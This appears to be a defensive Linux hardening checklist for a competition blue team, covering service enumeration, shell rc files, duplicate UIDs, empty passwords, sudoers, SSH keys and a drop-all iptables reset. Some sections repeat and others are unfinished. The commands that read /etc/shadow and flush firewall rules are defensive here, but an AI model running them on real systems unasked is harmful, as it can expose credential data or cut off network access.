Note: see OS info to get command history working on root, but please disable network connections and crontabs first.
This should be in some sort of documentation, but if not, refer to the scoreboard and enumerate services with ss -tulpn and ps flax
Note that iptables rules do not persist on reboot. Either install the iptables-persistent package or restore rules with iptables-restore < /etc/iptables/rules
Refer to the IPtables guide
Refer to Crontabs
Refer to Processes
Refer to Services
# Note that executable code can be inserted into any files that will run when you `cat` the file.
# To counteract this, read files using an editor like vi, vim, nano, etc
# Bash (most common)
vi /root/.bashrc
vi /home/<user>/.bashrc
# Sh
vi /root/.shrc
vi /home/<user>/.shrc
# Zsh
vi /root/.zshrc
vi /home/<user>/.zshrc
See the OS info page for more information (please read the user and password sections before just determining if a user is 'good' or not)
Make sure to verify UIDs and ensure there aren't duplicates also.
# Show all duplicate UIDs
cut /etc/passwd -d ':' -f 3 | sort | uniq -d
# Easily see what user has the duplicate
grep ":<UID>:" /etc/passwd
# Print any user that has an empty password (add passwords to these users)
sudo cat /etc/shadow | awk -F: '($2==""){print $1}'
# Read file (you'll have to manually check for misconfigurations, use google or something unless I get a guide)
visudo
# Check sudoers directory (everything in here is executed as if it was in the /etc/sudoers file
ls -la /etc/sudoers.d/
# Check ssh directory for keys that can be used by redteam to sign in (we likely don't need ssh keys)
ls -la /root/.ssh
ls -la /home/<user>/.ssh
Refer to the logging guide
[todo]
Refer to Service Hardening
Note: see OS info to get command history working on root, but please disable network connections and crontabs first.
Additionally, when hardening multiple machines, complete step one and two on each machine first before moving onto the next steps.
Refer to the IPtables guide for more information
# Set variables
IPTABLES=/sbin/iptables
# Remove previous firewall rules (run all commands in order)
$IPTABLES -F
$IPTABLES -F -t nat
$IPTABLES -X
$IPTABLES -P INPUT DROP
$IPTABLES -P OUTPUT DROP
$IPTABLES -P FORWARD DROP
# Save iptables rules
iptables-save > ~/rules
Refer to Crontabs
Refer to Processes
Refer to Services
# Note that executable code can be inserted into any files that will run when you `cat` the file.
# To counteract this, read files using an editor like vi, vim, nano, etc
# Bash (most common)
vi /root/.bashrc
vi /home/<user>/.bashrc
# Sh
vi /root/.shrc
vi /home/<user>/.shrc
# Zsh
vi /root/.zshrc
vi /home/<user>/.zshrc
See the OS info page for more information (please read the user and password sections before just determining if a user is 'good' or not)
Make sure to verify UIDs and ensure there aren't duplicates also.
# Show all duplicate UIDs
cut /etc/passwd -d ':' -f 3 | sort | uniq -d
# Easily see what user has the duplicate
grep ":<UID>:" /etc/passwd
# Print any user that has an empty password (add passwords to these users)
sudo cat /etc/shadow | awk -F: '($2==""){print $1}'
# Read file (you'll have to manually check for misconfigurations, use google or something unless I get a guide)
visudo
# Check sudoers directory (everything in here is executed as if it was in the /etc/sudoers file
ls -la /etc/sudoers.d/
# Check ssh directory for keys that can be used by redteam to sign in (we likely don't need ssh keys)
ls -la /root/.ssh
ls -la /home/<user>/.ssh
Refer to the IPtables guide
Refer to updates and installs
Refer to the logging guide
[todo]